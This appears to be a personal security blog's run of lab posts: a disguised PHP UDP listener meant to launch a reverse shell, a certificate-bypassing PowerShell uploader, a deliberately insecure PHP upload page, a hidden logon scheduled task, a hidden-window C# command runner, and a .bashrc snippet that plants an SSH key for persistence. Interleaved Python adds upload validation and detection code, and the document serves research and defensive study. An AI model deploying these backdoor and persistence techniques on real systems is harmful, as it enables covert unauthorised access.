Monday, November 29, 2021

Simple PHP Listener on UDP 10000

I found the following site, which demonstrates how to create a Linux service with systemd, and then extended the idea into a PHP UDP listener that can launch a reverse shell.


<?php
# Credit for the idea
# https://medium.com/@benmorel/creating-a-linux-service-with-systemd-611b5c8b91d6

# Bind a UDP socket on all interfaces, port 10000
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_bind($sock, '0.0.0.0', 10000);
$setIP = "";
$setPort = "";

for (;;) {
    # Datagram formats: "ip <address>\n", "port <number>\n", "status\n", "execute\n"
    socket_recvfrom($sock, $message, 1024, 0, $ip, $port);
    if (strpos($message, "ip") !== false) {
        # Drop the "ip " prefix and the trailing newline
        $setIP = substr($message, 3, -1);
        $reply = $setIP . "\n";
    }
    elseif (strpos($message, "port") !== false) {
        # Drop the "port " prefix and the trailing newline
        $setPort = substr($message, 5, -1);
        $reply = $setPort . "\n";
    }
    elseif ((strpos($message, "status") !== false) && (strlen($setIP) > 0) && (strlen($setPort) > 1)) {
        $reply = "IP: $setIP Port: $setPort\n";
    }
    elseif ((strpos($message, "execute") !== false) && (strlen($setIP) > 0) && (strlen($setPort) > 1)) {
        # Launches a php-reverseshell...
        $reply = "IP: $setIP Port: $setPort\n";
    }
    else {
        # Anything unrecognized gets a bland reply so the port looks like an ordinary service
        $reply = "Piwigo is working as expected!";
    }
    socket_sendto($sock, $reply, strlen($reply), 0, $ip, $port);
}

Tuesday, November 23, 2021

Powershell to Upload File to PHP Page

In the previous post, a PHP page was created to upload a file.  Below is PowerShell that can be used to upload a selected file from a Windows computer to that PHP page.

add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
    public bool CheckValidationResult(
        ServicePoint srvPoint, X509Certificate certificate,
        WebRequest request, int certificateProblem) {
        return true;
    }
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Tls12'

# Name of the file to upload to server
$FileName = 'test4.txt';
# Location of file to upload
$FilePath = 'C:\users\thepcn3rd\test1.txt';
# URL of webserver (with SSL cert)
$URL = 'https://172.16.53.133/upload.php';

$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
$fileEnc = [System.Text.Encoding]::GetEncoding('ISO-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString(); 
$LF = "`r`n";

# Most difficult part is below...
$bodyLines = ( 
    "--$boundary",
    "Content-Disposition: form-data; name=`"f`"; filename=`"$FileName`"",
    "Content-Type: application/octet-stream$LF",
    $fileEnc,
    "--$boundary",
    "Content-Disposition: form-data; name=`"submit`"$LF",
    "Upload",
    "--$boundary--$LF" 
) -join $LF

Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines 

Simple PHP to Upload File (Insecure)

Below is PHP code for a simple file upload page.  This code is insecure, since it accepts any file type and stores it under the client-supplied name, and could allow a backdoor to be uploaded to your server.


<?php
    if (isset($_POST['submit'])) {
        $currentDirectory = getcwd();
        $uploadDirectory = "/uploads/";

        $fileName = $_FILES['f']['name'];
        $fileTempName = $_FILES['f']['tmp_name'];

        $uploadPath = $currentDirectory . $uploadDirectory . basename($fileName);
        move_uploaded_file($fileTempName, $uploadPath);

        echo "The file " . basename($fileName) . " has been uploaded";
    }
?>

<html>
<body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="f">
        <input type="submit" name="submit" value="Upload">
    </form>
</body>
</html>
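The two posts above sit on either side of the same HTTP request: the PowerShell script builds a multipart/form-data body by hand, and the PHP page accepts whatever arrives in the "f" field. The following Python is an added example, not code from either post: it parses a body laid out exactly as the PowerShell script joins its $bodyLines, then applies the checks the PHP handler is missing (allowlisted extension, matching magic bytes, bounded size, and a server-chosen filename so the client name never reaches the filesystem path). The boundary, sample content and the ALLOWED_TYPES table are constructed for this example.

```python
import os
import re
import secrets
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample request body, laid out exactly as the PowerShell script joins
# its $bodyLines (CRLF between elements, a file field "f" and a "submit" field).
# The boundary and the file content are made up for this example.
BOUNDARY = "11111111-2222-3333-4444-555555555555"
CRLF = "\r\n"
SAMPLE_BODY = CRLF.join([
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="f"; filename="../notes.php"',
    "Content-Type: application/octet-stream" + CRLF,
    "<?php echo 'not an image'; ?>",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="submit"' + CRLF,
    "Upload",
    f"--{BOUNDARY}--" + CRLF,
]).encode("latin-1")


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    content: bytes


def _disp_param(disposition: str, key: str) -> Optional[str]:
    # Match `; name="..."` but not the `name=` inside `filename=`.
    m = re.search(rf'(?:^|;\s*){key}="([^"]*)"', disposition)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data parser (enough for bodies shaped like SAMPLE_BODY)."""
    delimiter = b"--" + boundary.encode("ascii")
    parts: List[Part] = []
    # split()[0] is the preamble before the first delimiter; the final chunk
    # begins with "--" because it follows the closing delimiter.
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        header_blob, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):
            content = content[:-2]  # CRLF that precedes the next delimiter
        headers = {}
        for line in header_blob.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        parts.append(Part(
            name=_disp_param(disposition, "name") or "",
            filename=_disp_param(disposition, "filename"),
            content_type=headers.get("content-type"),
            content=content,
        ))
    return parts


# Extension allowlist with the magic bytes each type must start with (constructed table).
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024


def validate_upload(part: Part) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason).

    Checks the PHP handler above does not make: the client filename never becomes
    part of a path, the extension is allowlisted, the content must carry the magic
    bytes of that type, and the size is bounded. The stored name is server-chosen.
    """
    if part.filename is None:
        return False, "not a file field"
    if not part.content or len(part.content) > MAX_BYTES:
        return False, "empty or oversized"
    # Strip directory components from either path style, then take the extension.
    ext = os.path.splitext(os.path.basename(part.filename.replace("\\", "/")))[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, f"extension {ext!r} not allowed"
    if not part.content.startswith(magic):
        return False, f"content does not look like {ext}"
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    for part in parse_multipart(SAMPLE_BODY, BOUNDARY):
        print(part.name, part.filename, validate_upload(part))
```

Run as a script, it prints the two parts of the constructed body and the verdict for each: the "f" part is rejected because ".php" is not in the allowlist, and the "submit" part is not a file at all. The parser is deliberately small; a production handler would use the web framework's own multipart parsing and keep only the validate_upload logic.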

Monday, November 22, 2021

XML File for Creating a Scheduled Task

Here is a simple XML file created by exporting a scheduled task.  The task was set up to run whenever any user logs on and to execute a PowerShell command with command-line arguments.



<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>thepcn3rd</UserId>
      <LogonType>S4U</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-c "... | Out-Null"</Arguments>
    </Exec>
  </Actions>
</Task>
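The same export format is what a defender reviews when hunting for tasks like this one. The Python below is an added example (not part of the original post): it parses Task Scheduler XML and reports the traits this task shows, namely a logon trigger with no UserId (so it fires for every user), Hidden set to true, the S4U logon type, and a script host as the action. The two sample task definitions are constructed to mirror the export above, with a placeholder Arguments value and a made-up benign task for comparison.

```python
import xml.etree.ElementTree as ET
from typing import List

# Task Scheduler XML namespace (the same one used in the export above).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts whose presence as a task action deserves a closer look.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample modelled on the export above; the Arguments value is a placeholder.
# Exported .xml files are UTF-16 with a BOM; ET.parse(path) handles that when reading a file.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>someuser</UserId><LogonType>S4U</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><ExecutionTimeLimit>PT72H</ExecutionTimeLimit></Settings>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command><Arguments>-c "Write-Output placeholder | Out-Null"</Arguments></Exec></Actions>
</Task>"""

# Constructed benign counterpart: a daily time trigger, not hidden, running a plain executable.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2021-11-22T09:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>someuser</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command></Exec></Actions>
</Task>"""


def _text(elem, path: str) -> str:
    # findtext returns "" for an empty element and the default when it is absent
    return (elem.findtext(path, default="", namespaces=NS) or "").strip()


def triage_task(xml_text: str) -> List[str]:
    """Return human-readable findings for one Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    for trig in root.findall("t:Triggers/t:LogonTrigger", NS):
        enabled = _text(trig, "t:Enabled") in ("", "true")  # a missing Enabled means enabled
        if enabled and trig.find("t:UserId", NS) is None:
            findings.append("logon trigger fires for every user (no UserId on the trigger)")
    if _text(root, "t:Settings/t:Hidden").lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")
    for principal in root.findall("t:Principals/t:Principal", NS):
        if _text(principal, "t:LogonType") == "S4U":
            findings.append("S4U logon type: runs as the user without a stored password or interactive session")
        if _text(principal, "t:RunLevel") == "HighestAvailable":
            findings.append("requests highest available privileges")
    for action in root.findall("t:Actions/t:Exec", NS):
        command = _text(action, "t:Command")
        basename = command.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if basename in SCRIPT_HOSTS:
            findings.append(f"action runs script host {basename} with arguments {_text(action, 't:Arguments')!r}")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("sample", SAMPLE_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, triage_task(xml_text) or ["no findings"])
```

On a live system the same function can be pointed at the exported definitions under C:\Windows\System32\Tasks (which are XML in this schema) to review every registered task rather than one export at a time.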

Simple C# Program to Execute Commands

I created a simple C# program that executes a chain of commands through cmd.exe...

using System;
using System.Text;
using System.Diagnostics;
using System.Threading;

namespace updateCheck
{
    public class check
    {
        public static void Main()
        {
            string executeCMD;
            executeCMD = "... && ";
            executeCMD += "... && ";
            executeCMD += "...";
            //Console.WriteLine(executeCMD);

            Process cmd = new Process();
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.RedirectStandardInput = true;
            cmd.StartInfo.RedirectStandardOutput = true;
            cmd.StartInfo.RedirectStandardError = true;
            cmd.StartInfo.CreateNoWindow = true;
            cmd.StartInfo.UseShellExecute = false;
            cmd.StartInfo.Arguments = "/C " + executeCMD;
            cmd.Start();
            // Read stdout before WaitForExit so the child cannot block on a full output pipe
            string output = cmd.StandardOutput.ReadToEnd();
            cmd.WaitForExit();
        }
    }
}




Monday, November 1, 2021

T1546 - Unix Shell Configuration Modification

As I was researching how "Unix Shell Configuration Modification" could be tested from a .bashrc file, I created the following bash commands.  They loop through the ~/.ssh/authorized_keys file reading each line and compare the sha256 checksum of each line against the checksum of the ssh key you wish to insert.  If the key is not present it is appended; if it already exists nothing is done.


exists="False"
while read -r l; do
  checksum=$(echo "$l" | sha256sum | awk '{print $1}')
  # For troubleshooting uncomment the following line to verify the checksum of the line in ~/.ssh/authorized_keys
  # echo "$checksum"
  # Substitute the checksum for the ssh-key that you want to be reintroduced to the authorized_keys file...
  if [ "$checksum" == "333459f693d01b41c0083bf8dc25ad51e08adf4a9474a3fb34198e3967d53bd4" ]; then
    exists="True"
  fi
done < ~/.ssh/authorized_keys
if [ "$exists" == "False" ]; then
  # Verify the ssh-key that you are using is placed below...
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCxGaIRqqBKzYJE+0atqKP9u/NCEElmevLyzdkPUYWHxZo16j8OykIfytbCDCagGobdCq4BOEQ48AoyecvFSG+G4NQib4iDDQMzp4+2b5Rs9LpAZgFAaU5BN2MIh7JNk6zWZ23Z5lOse4AembbyFsR0bQvfFSd1XzagUrmkH/Tg4EPgneieYyTp4vk2shvLWVxabZljsKd4hvV3Ei2xcCPU6nAqVoYNOAdUAI9HNkCf3ZDJU/zcm4MjGjCEoww0Krvuy9NuT2JIKdnk2OZHtKU4glIRLOQl3cI0AZaq6IF5VYsniVy+Ag6hVsLfEb7ByJIVlYkvgsW0POjfqLYezGd1Cwz5BKiTJUsCTt/GRhOgpAEkRVhY6TuMr/wgnyUMWxvSsiiLVahU4zvwyJsf8FD5vEhjc4yq+uwB7GX38fVam19LLRcF3OzHm3+mOxZRXjctnq5S6AQMRdTzHzC1tsj0= invalid@key" >> ~/.ssh/authorized_keys
fi
 
 
Reference: https://attack.mitre.org/techniques/T1546/004/ 
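The per-line checksum the bash loop uses can be turned around into a detection for this technique. The Python below is an added example, not part of the original post: it computes the same sha256 over each authorized_keys line (line plus newline, as `echo "$l" | sha256sum` does), compares it against an allowlist of known checksums, and reports every other key together with its OpenSSH SHA256 fingerprint so it can be matched against ssh-keygen -lf output. The file content and key blobs are constructed for the example and are not real keys; audit_file is the hypothetical entry point for a live file.

```python
import base64
import hashlib
import os
from typing import Dict, List, Set

# Constructed sample authorized_keys content. The base64 blobs are arbitrary bytes,
# not real keys, so the fingerprint logic can run offline.
KNOWN_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed-known-key-blob").decode() + " alice@laptop"
UNKNOWN_KEY = "ssh-rsa " + base64.b64encode(b"constructed-unknown-key-blob").decode() + " nobody@example"
SAMPLE_AUTHORIZED_KEYS = "\n".join(["# comment line", "", KNOWN_KEY, UNKNOWN_KEY]) + "\n"


def line_checksum(line: str) -> str:
    """SHA-256 of the line plus newline, matching `echo "$l" | sha256sum` in the bash above."""
    return hashlib.sha256((line + "\n").encode()).hexdigest()


def key_fingerprint(line: str) -> str:
    """OpenSSH-style SHA256 fingerprint of the key blob (what ssh-keygen -lf prints).

    The fingerprint identifies the key regardless of its comment or leading options,
    so it survives cosmetic edits that would change the line checksum. Options that
    contain spaces inside quotes are not handled by this simple split.
    """
    fields = line.split()
    type_index = next(i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-")))
    blob = base64.b64decode(fields[type_index + 1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(text: str, allowed_checksums: Set[str]) -> List[Dict[str, str]]:
    """Return every key line whose checksum is not on the allowlist."""
    unknown: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()  # `read` in the bash loop also trims surrounding whitespace
        if not line or line.startswith("#"):
            continue
        checksum = line_checksum(line)
        if checksum not in allowed_checksums:
            unknown.append({"line": line, "checksum": checksum, "fingerprint": key_fingerprint(line)})
    return unknown


def audit_file(path: str, allowed_checksums: Set[str]) -> List[Dict[str, str]]:
    """Hypothetical entry point for a real file, e.g. audit_file("~/.ssh/authorized_keys", allow)."""
    with open(os.path.expanduser(path), encoding="utf-8") as fh:
        return audit_authorized_keys(fh.read(), allowed_checksums)


if __name__ == "__main__":
    allow = {line_checksum(KNOWN_KEY)}
    for entry in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, allow):
        print("unknown key:", entry["fingerprint"], entry["line"][-20:])
```

Running it with only KNOWN_KEY on the allowlist reports UNKNOWN_KEY; adding that key's checksum to the allowlist silences it. Since the checksum is over the whole line, the allowlist should be refreshed whenever a legitimate key's comment or options change, which is exactly why the fingerprint is reported alongside it.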

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...